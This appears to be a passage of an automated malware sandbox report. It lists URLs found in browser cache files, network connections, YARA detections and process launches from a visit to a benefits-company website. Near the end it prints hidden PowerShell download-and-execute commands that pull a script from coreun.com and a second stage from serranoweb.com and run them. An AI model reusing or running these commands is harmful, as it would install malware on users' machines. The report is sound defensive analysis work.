Source: chromecache_304.1.dr	String found in binary or memory: https://player.vimeo.com/video/961277965?autoplay=0&muted=1&loop=1&background=0
Source: chromecache_351.1.dr	String found in binary or memory: https://px.ads.linkedin.com/collect?
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr	String found in binary or memory: https://reefe.com.au/ab/elevateinc/check/index.html
Source: chromecache_351.1.dr	String found in binary or memory: https://snap.licdn.com/li.lms-analytics/insight.min.js
Source: chromecache_325.1.dr	String found in binary or memory: https://stackoverflow.com/questions/15751012/
Source: chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr	String found in binary or memory: https://td.doubleclick.net/td/rul/
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://techcrunch.com/2021/10/04/elevate-launches-its-approach-to-managing-pre-tax-benefits-with-12
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://techcrunch.com/2023/04/13/elevate-lands-28m-to-help-employers-better-manage-benefits/
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://technical.ly/2021/11/02/elevate-brian-strom/
Source: chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr	String found in binary or memory: https://twitter.com/elevatedotinc
Source: chromecache_277.1.dr	String found in binary or memory: https://use.typekit.net
Source: chromecache_307.1.dr	String found in binary or memory: https://user.elevateaccounts.com/login
Source: chromecache_318.1.dr	String found in binary or memory: https://vimeo.com/ablincoln/vuid
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://www.benefitnews.com/list/3-challenges-hr-leaders-are-facing-in-todays-digital-benefits-world
Source: chromecache_357.1.dr	String found in binary or memory: https://www.benefitnews.com/news/elevate-is-making-it-so-that-employees-dont-have-to-choose-between-
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://www.benefitnews.com/opinion/incorporating-preventative-care-into-your-post-covid-benefits-ex
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://www.benefitspro.com/2021/10/29/bringing-consumer-directed-benefits-into-the-digital-era
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://www.benefitspro.com/2022/06/24/education-empowers-employees-to-better-leverage-benefits-a-lo
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://www.benefitspro.com/2022/10/18/employees-are-putting-off-health-care-needs-due-to-financial-
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://www.benefitspro.com/2024/09/03/ai-is-coming-to-benefits-top-3-strategies-for-hr-leaders/
Source: chromecache_357.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr	String found in binary or memory: https://www.benefitspro.com/2024/09/10/open-enrollment-might-look-different-this-year-with-new-ai-en
Source: chromecache_357.1.dr, chromecache_304.1.dr	String found in binary or memory: https://www.builtincolorado.com/2021/10/05/elevate-raises-12m-series-a-hsa-fsa-benefits-platform
Source: chromecache_304.1.dr	String found in binary or memory: https://www.elevate.inc
Source: chromecache_242.1.dr	String found in binary or memory: https://www.elevate.inc/blog
Source: chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_310.1.dr, chromecache_220.1.dr	String found in binary or memory: https://www.elevate.inc/case-studies/rippling
Source: chromecache_307.1.dr	String found in binary or memory: https://www.elevate.inc/component-parts
Source: chromecache_281.1.dr	String found in binary or memory: https://www.elevate.inc/our-story
Source: chromecache_357.1.dr	String found in binary or memory: https://www.elevate.inc/press
Source: chromecache_286.1.dr	String found in binary or memory: https://www.elevate.inc/request-a-demo
Source: chromecache_309.1.dr	String found in binary or memory: https://www.elevate.inc/resource-center
Source: chromecache_220.1.dr	String found in binary or memory: https://www.elevate.inc/use-cases/benefit-platforms
Source: chromecache_344.1.dr	String found in binary or memory: https://www.elevate.inc/use-cases/financial-institutions
Source: chromecache_320.1.dr	String found in binary or memory: https://www.elevate.inc/use-cases/health-plans
Source: chromecache_234.1.dr	String found in binary or memory: https://www.elevate.inc/use-cases/peo-software
Source: chromecache_310.1.dr	String found in binary or memory: https://www.elevate.inc/use-cases/third-party-administrators
Source: chromecache_237.1.dr	String found in binary or memory: https://www.elevate.inc/why-elevate
Source: chromecache_258.1.dr	String found in binary or memory: https://www.google.com
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.google.com/ccm/collect
Source: chromecache_258.1.dr	String found in binary or memory: https://www.google.com/ccm/conversion
Source: chromecache_258.1.dr	String found in binary or memory: https://www.google.com/ccm/form-data
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.google.com/pagead/1p-conversion
Source: chromecache_354.1.dr, chromecache_222.1.dr	String found in binary or memory: https://www.google.com/pagead/1p-user-list/11308007612/?random
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.google.com/pagead/form-data
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.google.com/travel/flights/click/conversion
Source: chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.googleadservices.com
Source: chromecache_258.1.dr	String found in binary or memory: https://www.googleadservices.com/ccm/conversion
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion
Source: chromecache_258.1.dr	String found in binary or memory: https://www.googletagmanager.com
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.googletagmanager.com/a?
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-P9P7XCFQQT
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr	String found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-WTL5WC6F
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.googletagmanager.com/static/service_worker/
Source: chromecache_357.1.dr	String found in binary or memory: https://www.hrtechoutlook.com/news/elevate-and-visa-collaborated-to-provide-push-to-debit-health-rei
Source: chromecache_281.1.dr, chromecache_309.1.dr, chromecache_242.1.dr, chromecache_357.1.dr, chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr	String found in binary or memory: https://www.instagram.com/elevatedotinc/
Source: chromecache_286.1.dr, chromecache_320.1.dr, chromecache_344.1.dr, chromecache_234.1.dr, chromecache_237.1.dr, chromecache_304.1.dr, chromecache_310.1.dr, chromecache_220.1.dr, chromecache_307.1.dr	String found in binary or memory: https://www.linkedin.com/company/elevatedotinc
Source: chromecache_281.1.dr	String found in binary or memory: https://www.linkedin.com/in/aliciamainoberg/
Source: chromecache_281.1.dr	String found in binary or memory: https://www.linkedin.com/in/amanda-richter-4a22a5215/
Source: chromecache_281.1.dr	String found in binary or memory: https://www.linkedin.com/in/bstrom/
Source: chromecache_281.1.dr	String found in binary or memory: https://www.linkedin.com/in/cosgray/
Source: chromecache_281.1.dr	String found in binary or memory: https://www.linkedin.com/in/keithsoranno/
Source: chromecache_281.1.dr	String found in binary or memory: https://www.linkedin.com/in/scottrosecoo/
Source: chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.merchant-center-analytics.goog
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/benefits-platform-elevate-raises-28m-in-growth-funding-3017
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-and-visa-collaborate-on-push-to-debit-health-reimbu
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-drivewealth-and-intellicents-partner-to-deliver-emb
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-honored-with-2024-hr-tech-award-for-ai-innovations-
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-honored-with-benefitspros-2024-luminaries-award-302
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-lands-more-top-flight-talent-as-several-employee-be
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-launches-with-15m-funding-to-modernize-consumer-dir
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-named-best-consumer-payments-platform-in-9th-annual
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-named-to-incs-2024-best-in-business-list-as-on-the-
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/elevate-secures-20-million-in-growth-funding-led-by-fin-cap
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/employee-benefit-news-names-elevates-brian-strom-as-outstan
Source: chromecache_357.1.dr	String found in binary or memory: https://www.prnewswire.com/news-releases/employers-demand-ai-to-improve-benefits-administration-and-
Source: chromecache_357.1.dr	String found in binary or memory: https://www.pymnts.com/partnerships/2022/elevate-teams-with-visa-on-push-to-debit-health-reimburseme
Source: powershell.exe, 00000011.00000002.1613979532.0000019151F95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1613979532.0000019151CD1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.serranoweb.com
Source: powershell.exe, 00000011.00000002.1613503118.000001914EEA0000.00000004.00000020.00020000.00000000.sdmp, x.js.14.dr	String found in binary or memory: https://www.serranoweb.com/42/504.txt
Source: wscript.exe, 00000010.00000002.1551038903.0000027EB5545000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.serranoweb.com/42/504.txtP
Source: chromecache_265.1.dr, chromecache_336.1.dr, chromecache_351.1.dr, chromecache_282.1.dr, chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.youtube.com
Source: chromecache_329.1.dr, chromecache_258.1.dr	String found in binary or memory: https://www.youtube.com/iframe_api

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49800 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 150.171.29.254:443 -> 192.168.2.16:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.175.173.86:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 161.97.71.23:443 -> 192.168.2.16:49808 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_1476.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"			Jump to behavior

Yara signature match

Source: amsi64_1476.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.expl.evad.win@36/261@109/43

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2068:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkqp2qem.1gi.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,14016717888141100612,18276768270770346762,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=1556 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.elevate.inc/"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ep bypass -w hidden -c "$l='https://coreun.com/wp-content/d5';$p=Join-Path $env:TEMP 'x.js';try{(New-Object Net.WebClient).DownloadFile($l,$p);Start-Process wscript -ArgumentList '//nologo',$p -WindowStyle Hidden}catch{}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" //nologo C:\Users\user\AppData\Local\Temp\x.js
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('"https://www.serranoweb.com/42/504.txt"')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
